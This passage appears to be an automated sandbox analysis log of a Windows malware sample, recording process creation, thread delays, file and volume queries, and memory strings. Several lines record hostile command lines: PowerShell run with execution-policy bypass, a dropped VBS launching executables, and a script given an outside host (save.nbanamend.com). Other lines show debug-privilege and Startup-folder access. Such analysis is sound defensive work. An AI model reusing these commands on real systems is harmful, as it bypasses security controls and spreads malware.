Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4068Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7251
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2041
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4572
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3156
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897827
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897694
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897436
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897327
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896936
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895891
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895594
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895203
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 895074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894641
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 894125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893979
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893702
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 893124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892719
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892459
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 892297
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: powershell.exe, 00000017.00000003.488201386.00000000052DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: MRZANK.exe, 00000012.00000002.539363033.000000000110A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: powershell.exe, 00000017.00000003.488201386.00000000052DA000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\JQHPQS\MRZANK.exeQueries volume information: C:\JQHPQS\AZJVGE VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
